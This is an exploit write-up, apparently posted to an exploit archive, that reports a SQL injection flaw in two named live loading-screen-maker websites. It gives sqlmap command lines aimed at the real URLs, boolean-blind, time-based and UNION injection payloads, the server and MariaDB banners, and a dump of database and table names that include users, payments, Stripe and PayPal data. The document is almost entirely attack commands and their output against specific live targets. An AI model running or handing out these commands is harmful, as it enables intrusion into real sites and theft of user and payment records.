# Exploit Title: FiveM & Gmod Loading Screen Maker Free | SQL Injection Vulnerability
# Author: Чингис хаан
# Tested On: Kali Linux
# sqlmap -u "https://www.fivem-lsm.com/help/category/index.php?id=1&s=7" --dbs --banner --batch
# sqlmap -u "https://www.gmod-lsm.com/help/category/index.php?id=1&s=7" --dbs --banner --batch
---------------------------------------------------------------------------------------------------
FiveM Loading Screen Maker Free
Gmod Loading Screen Maker Free
https://www.fivem-lsm.com/help/category/index.php?id=1&s=7
https://www.gmod-lsm.com/help/category/index.php?id=1&s=7
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 5974=5974

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 3621 FROM (SELECT(SLEEP(5)))sZGN)

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162766271,0x6f694177744f414c556e7678635144664177676c5964686b52686b42534165786745614b48435744,0x7178786a71),NULL,NULL-- -
---
the back-end DBMS is MySQL
web application technology: PHP 7.4.26, PHP, Nginx
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
banner: '10.1.48-MariaDB-0ubuntu0.18.04.1'
available databases [2]:
[+] fivem_db
[+] gmod_db
[+] information_schema
Database: fivem_db
gmod_db
[24 tables]
+----------------------+
| authcode             |
| blog                 |
| designs              |
| fonts                |
| knowledge_articles   |
| knowledge_categories |
| languages            |
| loadingscreens       |
| login_code           |
| music                |
| own_music            |
| payments             |
| paypal_log           |
| settings             |
| staff_cache          |
| statistics           |
| stripe_customer      |
| submit_languages     |
| subscriptions        |
| tags                 |
| user_payments        |
| user_subscriptions   |
| users                |
| views                |
+----------------------+